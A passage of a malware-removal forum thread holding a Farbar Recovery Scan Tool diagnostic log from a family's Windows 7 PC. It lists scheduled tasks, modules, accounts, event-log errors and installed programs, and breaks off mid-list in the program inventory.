{DC9A6A02-E5EC-4CAC-95EF-8E0D78F46005} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-18] (Google Inc.)</p><p>Task: {EB0DCF51-762B-4E1E-ACFC-D3C3AE1E1C8D} - System32\Tasks\Sansa Dispatch => C:\Users\Gary\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe [2014-04-28] (SanDisk Corporation)</p><p>Task: {EBC50E33-3B6F-4DB4-97D5-05504B8287A1} - System32\Tasks\vtscheduletask => C:\Program Files (x86)\McAfee\Supportability\MVT\MvtApp.exe</p><p>Task: {EC5C1974-86DC-4E84-93A2-7DF18178491B} - System32\Tasks\{8C5F56B2-3456-4F9C-94FB-9511ADF34262} => C:\Program Files (x86)\iTunes\iTunes.exe [2014-08-01] (Apple Inc.)</p><p>Task: {F0134E16-4337-4727-A626-62B24A15A4E7} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)</p><p>Task: {F518FED8-1C23-49F3-B5CC-61C7AD23EA47} - System32\Tasks\HP online update program => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [2013-05-30] (Hewlett-Packard)</p><p>Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe</p><p>Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000Core.job => C:\Users\Gary\AppData\Local\Facebook\Update\FacebookUpdate.exe</p><p>Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000UA.job => C:\Users\Gary\AppData\Local\Facebook\Update\FacebookUpdate.exe</p><p>Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</p><p>Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</p><p>Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000Core1cf4afcedbeedb2.job => C:\Users\Gary\AppData\Local\Google\Update\GoogleUpdate.exe</p><p>Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1000UA1cf23a95ab00a5d.job => C:\Users\Gary\AppData\Local\Google\Update\GoogleUpdate.exe</p><p>Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1005Core.job => C:\Users\Katie\AppData\Local\Google\Update\GoogleUpdate.exe</p><p>Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1776543140-210536247-3466770518-1005UA.job => C:\Users\Katie\AppData\Local\Google\Update\GoogleUpdate.exe</p><p>Task: C:\Windows\Tasks\vtscheduletask.job => C:\Program Files (x86)\McAfee\Supportability\MVT\MvtApp.exe</p><p></p><p>==================== Loaded Modules (whitelisted) =============</p><p></p><p>2007-06-05 14:20 - 2007-06-05 14:20 - 00177704 ____N () C:\Windows\SysWOW64\PSIService.exe</p><p>2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF</p><p>2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll</p><p>2010-04-24 00:47 - 2011-08-18 11:05 - 02751808 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\COMPONENTS\SCHEDULER\STSERVICE.EXE</p><p>2014-06-15 08:56 - 2014-06-15 08:56 - 19752256 _____ () C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe</p><p>2014-06-15 08:35 - 2014-06-15 08:35 - 00160256 _____ () C:\Program Files\Verizon Cloud\libexpat.dll</p><p>2014-06-15 08:36 - 2014-06-15 08:36 - 15655424 _____ () C:\Program Files\Verizon Cloud\avcodec-54.dll</p><p>2014-06-15 08:36 - 2014-06-15 08:36 - 00217600 _____ () C:\Program Files\Verizon Cloud\avutil-51.dll</p><p>2014-06-15 08:36 - 2014-06-15 08:36 - 03004928 _____ () C:\Program Files\Verizon Cloud\avformat-54.dll</p><p>2014-06-15 08:36 - 2014-06-15 08:36 - 00347648 _____ () C:\Program Files\Verizon Cloud\swscale-2.dll</p><p>2014-10-15 03:52 - 2014-10-15 03:52 - 00472576 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_64\VistaBridgeLibrary\c29d8779b3a3599f44e21e017541cd0c\VistaBridgeLibrary.ni.dll</p><p>2008-08-08 18:30 - 2008-08-08 18:30 - 00016712 ____R () C:\Program Files (x86)\Corel\Corel Paint Shop Pro Photo X2\CorelIOMonitor.exe</p><p>2014-02-06 01:52 - 2014-02-06 01:52 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll</p><p>2014-02-06 01:52 - 2014-02-06 01:52 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll</p><p>2011-01-20 06:25 - 2011-01-20 06:25 - 00854016 _____ () C:\Windows\assembly\GAC_32\System.Data.SQLite\1.0.61.0__db937bc2d44ff139\System.Data.SQLite.dll</p><p>2011-01-20 06:25 - 2011-01-20 06:25 - 00476520 _____ () C:\Windows\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.136.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll</p><p>2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Internet Services\zlib1.dll</p><p>2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Internet Services\libxml2.dll</p><p>2010-04-24 00:42 - 2009-02-06 18:52 - 00073728 _____ () C:\Windows\SysWOW64\CmdRtr.DLL</p><p>2010-04-24 00:42 - 2009-06-29 10:54 - 00164864 _____ () C:\Windows\SysWOW64\APOMngr.DLL</p><p>2010-07-07 12:33 - 2010-07-07 12:33 - 00002560 _____ () C:\Windows\SysWOW64\CTXFIRES.DLL</p><p>2011-03-07 21:25 - 2001-08-23 20:00 - 01388544 _____ () C:\Program Files (x86)\AML Products\Registry Cleaner\MSVBVM60.DLL</p><p>2011-03-07 21:25 - 2009-10-29 17:10 - 00615424 _____ () C:\Program Files (x86)\AML Products\Registry Cleaner\Styles\Office2007.cjstyles</p><p>2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF</p><p>2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll</p><p>2014-11-01 01:21 - 2014-10-22 00:04 - 01042760 _____ () C:\Users\Gary\AppData\Local\Google\Chrome\Application\38.0.2125.111\libglesv2.dll</p><p>2014-11-01 01:21 - 2014-10-22 00:04 - 00211272 _____ () C:\Users\Gary\AppData\Local\Google\Chrome\Application\38.0.2125.111\libegl.dll</p><p>2014-11-01 01:21 - 2014-10-22 00:04 - 08910664 _____ () C:\Users\Gary\AppData\Local\Google\Chrome\Application\38.0.2125.111\pdf.dll</p><p>2014-11-01 01:21 - 2014-10-22 00:04 - 01681224 _____ () C:\Users\Gary\AppData\Local\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll</p><p></p><p>==================== Alternate Data Streams (whitelisted) =========</p><p></p><p>(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)</p><p></p><p>AlternateDataStreams: C:\ProgramData\TEMP<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="smilie smilie--sprite smilie--sprite116" alt=":D" title="Big grin :D" loading="lazy" data-shortname=":D" />1B5B4F1</p><p></p><p>==================== Safe Mode (whitelisted) ===================</p><p></p><p>(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)</p><p></p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\atashost => ""="Service"</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SprtListen => ""="Service"</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SprtListenPush => ""="Service"</p><p>HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SupportSoft RemoteAssist => ""="Service"</p><p></p><p>==================== EXE Association (whitelisted) =============</p><p></p><p>(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)</p><p></p><p></p><p>==================== MSCONFIG/TASK MANAGER disabled items =========</p><p></p><p>(Currently there is no automatic fix for this section.)</p><p></p><p></p><p>========================= Accounts: ==========================</p><p></p><p>Administrator (S-1-5-21-1776543140-210536247-3466770518-500 - Administrator - Disabled)</p><p>Gary (S-1-5-21-1776543140-210536247-3466770518-1000 - Administrator - Enabled) => C:\Users\Gary</p><p>Guest (S-1-5-21-1776543140-210536247-3466770518-501 - Limited - Enabled) => C:\Users\Guest</p><p>HomeGroupUser$ (S-1-5-21-1776543140-210536247-3466770518-1002 - Limited - Enabled)</p><p>Katie (S-1-5-21-1776543140-210536247-3466770518-1005 - Limited - Enabled) => C:\Users\Katie</p><p>Linda (S-1-5-21-1776543140-210536247-3466770518-1003 - Limited - Enabled) => C:\Users\Linda</p><p>Nick (S-1-5-21-1776543140-210536247-3466770518-1004 - Limited - Enabled) => C:\Users\Nick</p><p></p><p>==================== Faulty Device Manager Devices =============</p><p></p><p></p><p>==================== Event log errors: =========================</p><p></p><p>Application errors:</p><p>==================</p><p>Error: (11/01/2014 10:47:46 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7</p><p>Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22</p><p>Exception code: 0xc00000fd</p><p>Fault offset: 0x000b18b2</p><p>Faulting process id: 0x4cbc</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p></p><p>Error: (11/01/2014 08:44:08 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7</p><p>Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22</p><p>Exception code: 0xc00000fd</p><p>Fault offset: 0x00094fce</p><p>Faulting process id: 0x16f4</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p></p><p>Error: (11/01/2014 06:13:06 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7</p><p>Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22</p><p>Exception code: 0xc00000fd</p><p>Fault offset: 0x00094fbf</p><p>Faulting process id: 0x3b94</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p></p><p>Error: (11/01/2014 05:21:33 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7</p><p>Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22</p><p>Exception code: 0xc00000fd</p><p>Fault offset: 0x00095c91</p><p>Faulting process id: 0x2990</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p></p><p>Error: (11/01/2014 04:46:11 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7</p><p>Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22</p><p>Exception code: 0xc00000fd</p><p>Fault offset: 0x00095c91</p><p>Faulting process id: 0x2cc0</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p></p><p>Error: (11/01/2014 01:40:37 AM) (Source: VSS) (EventID: 8193) (User: )</p><p>Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80040154, Class not registered</p><p>.</p><p></p><p>Error: (11/01/2014 01:40:37 AM) (Source: VSS) (EventID: 22) (User: )</p><p>Description: Volume Shadow Copy Service error: A critical component required by the Volume Shadow Copy service is not registered.</p><p>This might happened if an error occurred during Windows setup or during installation of a Shadow Copy provider.</p><p>The error returned from CoCreateInstance on class with CLSID {0b5a2c52-3eb9-470a-96e2-6c6d4570e40f} and Name Coordinator is [0x80040154, Class not registered</p><p>].</p><p></p><p>Error: (11/01/2014 01:24:07 AM) (Source: Application Hang) (EventID: 1002) (User: )</p><p>Description: The program IEXPLORE.EXE version 11.0.9600.17344 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.</p><p></p><p>Process ID: 26c0</p><p></p><p>Start Time: 01cff593c23e4abe</p><p></p><p>Termination Time: 0</p><p></p><p>Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE</p><p></p><p>Report Id:</p><p></p><p>Error: (10/31/2014 11:41:27 PM) (Source: AVLogEvent) (EventID: 5005) (User: NT AUTHORITY)</p><p>Description: Content is missing.</p><p>Error Code:a7f42014</p><p></p><p>Error: (10/31/2014 08:18:19 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: pcdrcui.exe, version: 6.0.6426.22, time stamp: 0x52cfadb3</p><p>Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a</p><p>Exception code: 0xe0434352</p><p>Fault offset: 0x000000000000940d</p><p>Faulting process id: 0x39cc</p><p>Faulting application start time: 0xpcdrcui.exe0</p><p>Faulting application path: pcdrcui.exe1</p><p>Faulting module path: pcdrcui.exe2</p><p>Report Id: pcdrcui.exe3</p><p></p><p></p><p>System errors:</p><p>=============</p><p>Error: (11/01/2014 01:20:15 AM) (Source: DCOM) (EventID: 10010) (User: )</p><p>Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}</p><p></p><p>Error: (11/01/2014 01:18:58 AM) (Source: Service Control Manager) (EventID: 7011) (User: )</p><p>Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the SftService service.</p><p></p><p>Error: (11/01/2014 01:18:59 AM) (Source: DCOM) (EventID: 10010) (User: )</p><p>Description: {211EBA3A-EA5A-496B-A021-5C6BEB365E4C}</p><p></p><p>Error: (10/31/2014 11:42:29 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)</p><p>Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)</p><p></p><p>Error: (10/31/2014 11:41:29 PM) (Source: Service Control Manager) (EventID: 7026) (User: )</p><p>Description: The following boot-start or system-start driver(s) failed to load: </p><p>RxFilter</p><p></p><p>Error: (10/31/2014 11:41:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )</p><p>Description: The SessionLauncher service failed to start due to the following error: </p><p>%%3</p><p></p><p>Error: (10/31/2014 11:41:08 PM) (Source: Service Control Manager) (EventID: 7023) (User: )</p><p>Description: The Pml Driver HPZ12 service terminated with the following error: </p><p>%%2</p><p></p><p>Error: (10/31/2014 11:41:08 PM) (Source: Service Control Manager) (EventID: 7023) (User: )</p><p>Description: The Net Driver HPZ12 service terminated with the following error: </p><p>%%2</p><p></p><p>Error: (10/31/2014 08:43:17 PM) (Source: DCOM) (EventID: 10010) (User: )</p><p>Description: {F9717507-6651-4EDB-BFF7-AE615179BCCF}</p><p></p><p>Error: (10/31/2014 08:43:14 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)</p><p>Description: The following fatal alert was generated: 70. The internal error state is 105.</p><p></p><p></p><p>Microsoft Office Sessions:</p><p>=========================</p><p>Error: (11/01/2014 11:05:48 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: pcdrcui.exe6.0.6426.2252cfadb3KERNELBASE.dll6.1.7601.184095315a05ae0434352000000000000940d403801cff5e548bb0fb8C:\Program Files\My Dell\pcdrcui.exeC:\Windows\system32\KERNELBASE.dll8f4fbf7d-61d8-11e4-8c81-0025648bf898</p><p></p><p>Error: (11/01/2014 11:05:46 AM) (Source: .NET Runtime) (EventID: 1026) (User: )</p><p>Description: Application: pcdrcui.exe</p><p>Framework Version: v4.0.30319</p><p>Description: The process was terminated due to an unhandled exception.</p><p>Exception Info: Pcd.DataStore.DatabaseError</p><p>Stack:</p><p> at Pcd.DataStore.AppStateDataStore..ctor()</p><p> at pcd.models.properties.UserSetting.Init()</p><p> at pcd.controllers.MainController.InitializeProperties()</p><p> at pcd.controllers.MainController.BackgroundStartThread()</p><p> at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)</p><p> at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)</p><p> at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)</p><p> at System.Threading.ThreadHelper.ThreadStart()</p><p></p><p>Error: (11/01/2014 10:47:46 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000b18b24cbc01cff5e2b8ec43e3C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll0a87a3ea-61d6-11e4-8c81-0025648bf898</p><p></p><p>Error: (11/01/2014 08:44:08 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fce16f401cff5d07638ba88C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllc4e28658-61c4-11e4-8c81-0025648bf898</p><p></p><p>Error: (11/01/2014 06:13:06 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf3b9401cff5bc29cd810fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllab406e96-61af-11e4-8c81-0025648bf898</p><p></p><p>Error: (11/01/2014 05:21:33 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00095c91299001cff5b42c55af55C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll76d2dab8-61a8-11e4-8c81-0025648bf898</p><p></p><p>Error: (11/01/2014 04:46:11 AM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00095c912cc001cff5afa7e4d37cC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll8763b17d-61a3-11e4-8c81-0025648bf898</p><p></p><p>Error: (11/01/2014 01:40:37 AM) (Source: VSS) (EventID: 8193) (User: )</p><p>Description: CoCreateInstance0x80040154, Class not registered</p><p></p><p>Error: (11/01/2014 01:40:37 AM) (Source: VSS) (EventID: 22) (User: )</p><p>Description: {0b5a2c52-3eb9-470a-96e2-6c6d4570e40f}Coordinator0x80040154, Class not registered</p><p></p><p>Error: (11/01/2014 01:24:07 AM) (Source: Application Hang) (EventID: 1002) (User: )</p><p>Description: IEXPLORE.EXE11.0.9600.1734426c001cff593c23e4abe0C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE</p><p></p><p></p><p>CodeIntegrity Errors:</p><p>===================================</p><p> Date: 2012-03-14 18:51:27.927</p><p> Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\WINDOWS\System32\drivers\usbaapl64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.</p><p></p><p> Date: 2012-03-14 18:51:27.877</p><p> Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\WINDOWS\System32\drivers\usbaapl64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.</p><p></p><p></p><p>==================== Memory info =========================== </p><p></p><p>Processor: Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz</p><p>Percentage of memory in use: 55%</p><p>Total physical RAM: 6134.99 MB</p><p>Available physical RAM: 2743.25 MB</p><p>Total Pagefile: 12268.16 MB</p><p>Available Pagefile: 7228.02 MB</p><p>Total Virtual: 8192 MB</p><p>Available Virtual: 8191.82 MB</p><p></p><p>==================== Drives ================================</p><p></p><p>Drive c: (OS) (Fixed) (Total:689.47 GB) (Free:443.55 GB) NTFS</p><p>Drive f: (Expansion Drive) (Fixed) (Total:931.51 GB) (Free:318.95 GB) NTFS</p><p></p><p>==================== MBR & Partition Table ==================</p><p></p><p>========================================================</p><p>Disk: 0 (MBR Code: Windows 7 or 8) (Size: 698.6 GB) (Disk ID: C796C701)</p><p>Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)</p><p>Partition 2: (Active) - (Size=9.1 GB) - (Type=07 NTFS)</p><p>Partition 3: (Not Active) - (Size=689.5 GB) - (Type=07 NTFS)</p><p></p><p>========================================================</p><p>Disk: 1 (Size: 931.5 GB) (Disk ID: 0013EBBB)</p><p>Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)</p><p></p><p>==================== End Of Log ====================</p></blockquote><p></p>
[QUOTE="gski69, post: 290717, member: 30080"] Additional scan result of Farbar Recovery Scan Tool (x64) Version: 01-11-2014 Ran by Gary at 2014-11-01 11:02:50 Running from C:\Users\Gary\Downloads Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892} AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 64 Bit HP CIO Components Installer (Version: 7.2.4 - Hewlett-Packard) Hidden Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.7.1.19610 - Adobe Systems Incorporated) Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated) Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated) Adobe Shockwave Player 11.5 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.5.9.620 - Adobe Systems, Inc.) Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC) AML Free Registry Cleaner 4.25 (HKLM-x32\...\{315F5FFC-1A5C-4A2A-B8E7-1C5B1174C198}_is1) (Version: - AML SOFT, Inc.) Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.) Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.) Ask Toolbar (HKLM-x32\...\{4F524A2D-5637-4300-76A7-A758B70C0700}) (Version: 12.7.0.15 - APN, LLC) <==== ATTENTION ATI Catalyst Control Center (HKLM-x32\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.009.1209.2334 - ) AXIS Media Control Embedded (HKLM-x32\...\AXIS Media Control Embedded) (Version: - ) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) Canon DIGITAL CAMERA Solution Disk Software Guide (HKLM-x32\...\Software Guide) (Version: 1.5.0.1 - Canon Inc.) CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.1.2 - Canon Inc.) CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.9.0.9 - Canon Inc.) Canon MOV Decoder (HKLM-x32\...\Canon MOV Decoder) (Version: 1.8.0.7 - Canon Inc.) Canon MOV Encoder (HKLM-x32\...\Canon MOV Encoder) (Version: 1.7.0.3 - Canon Inc.) Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.8.0.5 - Canon Inc.) Canon PowerShot SX230 HS and PowerShot SX220 HS Camera User Guide (HKLM-x32\...\CameraUserGuide-PSSX230HSandPSSX220HS) (Version: 1.0.1.2 - Canon Inc.) Canon Utilities CameraWindow DC 8 (HKLM-x32\...\CameraWindowDC8) (Version: 8.5.0.7 - Canon Inc.) Canon Utilities CameraWindow Launcher (HKLM-x32\...\CameraWindowLauncher) (Version: 7.5.0.2 - Canon Inc.) Canon Utilities Map Utility (HKLM-x32\...\MapUtility) (Version: 1.0.0.19 - Canon Inc.) Canon Utilities Movie Uploader for YouTube (HKLM-x32\...\MovieUploaderForYouTube) (Version: 1.2.0.7 - Canon Inc.) Canon Utilities MyCamera (HKLM-x32\...\MyCamera) (Version: 7.4.0.2 - Canon Inc.) Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.) Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.7.2.33 - Canon Inc.) Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.5.1.10 - Canon Inc.) ccc-core-static (x32 Version: 2009.1209.2335.42329 - ATI) Hidden CCleaner (HKLM\...\CCleaner) (Version: 4.19 - Piriform) Cisco Connect (HKLM-x32\...\Cisco Connect) (Version: 1.4.12284.0 - Cisco Consumer Products LLC) Citrix Online Launcher (HKLM-x32\...\{B025BA0B-64A6-46DE-9D64-32965C83CCA9}) (Version: 1.0.179 - Citrix) Corel MediaOne (HKLM-x32\...\{3C569633-C8DE-46E2-BB8F-F65198681C2F}) (Version: 2.100.0000 - Corel Corporation) Corel Paint Shop Pro Photo X2 (HKLM-x32\...\{64E72FB1-2343-4977-B4A8-262CD53D0BD3}) (Version: 12.50.0001 - Corel Corporation) Corel Painter Photo Essentials 4 (x32 Version: 4.0 - Corel Corporation) Hidden Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated) Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited) Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.40 - Creative Technology Limited) Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.02 - Creative Technology Limited) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Dell DataSafe Local Backup - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 9.4.60 - Dell) Dell DataSafe Local Backup (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 9.4.60 - Dell) Dell Dock (HKLM-x32\...\Dell Dock) (Version: - Stardock Corporation) Dell Dock (Version: 2.0 - Stardock Corporation) Hidden Dell Edoc Viewer 